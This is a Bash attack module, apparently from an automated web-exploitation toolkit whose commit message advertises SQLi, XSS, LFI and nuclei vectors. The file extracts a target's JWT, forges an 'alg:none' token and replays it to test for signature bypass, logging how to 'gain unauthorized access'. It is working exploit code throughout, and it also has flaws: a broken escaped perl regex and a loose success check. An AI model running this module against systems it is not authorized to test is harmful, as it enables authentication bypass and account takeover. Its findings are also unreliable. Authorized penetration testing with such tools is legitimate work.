Files
th-analyzer/vectors/12-jwt.sh
drjones e832ef3b46 v2: real exploitation — discovery phase, nuclei CVE scanning, SQLi/XSS/LFI rebuild
- New discovery engine (engine/discovery.sh): crawls target for real
  URLs, forms, parameters, and API endpoints before attacking
- New nuclei vector (21): runs nuclei templates for real CVE detection
  (critical/high/medium severity)
- Rebuilt SQLi vector: tests discovered forms and URL params with
  error-based and time-based blind payloads, sqlmap injection
- Rebuilt XSS vector: multi-context payloads against discovered
  forms/params, confirms payload reflection
- Rebuilt LFI vector: tests all discovered and common file parameters
  with traversal payloads, confirms by reading /etc/passwd
- Updated main analyzer with 5-step pipeline: connectivity →
  discovery → recon → Ollama brain → exploitation
2026-06-19 06:27:33 -07:00

68 lines
2.3 KiB
Bash
Executable File

#!/usr/bin/env bash
# Vector 12: JWT Attacks
# Desc: JWT token manipulation (none alg, weak keys, etc.)
# Detect: JWT tokens in cookies, headers, or params
# Severity: HIGH
# Tools: curl, jq
vector_jwt() {
local target="$1"
local report="$2"
local findings=0
print_info "Testing JWT attack vectors..."
# Look for JWT in cookies or headers
local auth_header=$(curl -sI --connect-timeout 5 --max-time 10 "$target" 2>/dev/null | grep -i "^authorization:\|^set-cookie:")
local jwt_pattern='eyJ[a-zA-Z0-9_-]*\.eyJ[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*'
local jwt=$(echo "$auth_header" | perl -nle 'print \$& if /\$jwt_pattern/' | head -1)
if [ -z "$jwt" ]; then
# Check page content
local page=$(curl -s --connect-timeout 5 --max-time 10 "$target" 2>/dev/null)
jwt=$(echo "$page" | perl -nle 'print \$& if /\$jwt_pattern/' | head -1)
fi
if [ -n "$jwt" ]; then
print_find "JWT token found!" "${jwt:0:50}..."
# Decode header
local header=$(echo "$jwt" | cut -d. -f1 | base64 -d 2>/dev/null)
local payload=$(echo "$jwt" | cut -d. -f2 | base64 -d 2>/dev/null)
print_info "Header: $header"
print_info "Payload: $payload"
# Test "none" algorithm attack
local header_b64=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '+/' '-_')
local payload_b64=$(echo "$jwt" | cut -d. -f2)
local none_jwt="${header_b64}.${payload_b64}."
local response=$(curl -s --connect-timeout 5 --max-time 10 \
-H "Authorization: Bearer $none_jwt" \
"$target" 2>/dev/null)
if echo "$response" | grep -qi "admin\|dashboard\|profile\|200\|success"; then
print_find "JWT 'none' algorithm bypass!" "Token accepted without signature"
echo "SEVERITY: CRITICAL
VECTOR: JWT Algorithm Confusion (none)
DETAIL: Server accepts 'alg:none' JWT token on $target
EVIDENCE: Token with 'none' alg accepted by server
EXPLOIT: Replace alg with 'none', remove signature, gain unauthorized access" > "$REPORTS_DIR/.finding_$(date +%s)_jwt-none.txt"
findings=$((findings + 1))
fi
# Save JWT info for report
echo "SEVERITY: INFO
VECTOR: JWT Token Discovery
DETAIL: JWT token found on $target
EVIDENCE: Token: ${jwt:0:80}...
EXPLOIT: Try jwt_tool for further analysis" > "$REPORTS_DIR/.finding_$(date +%s)_jwt-found.txt"
else
print_skip "No JWT tokens found"
fi
return $findings
}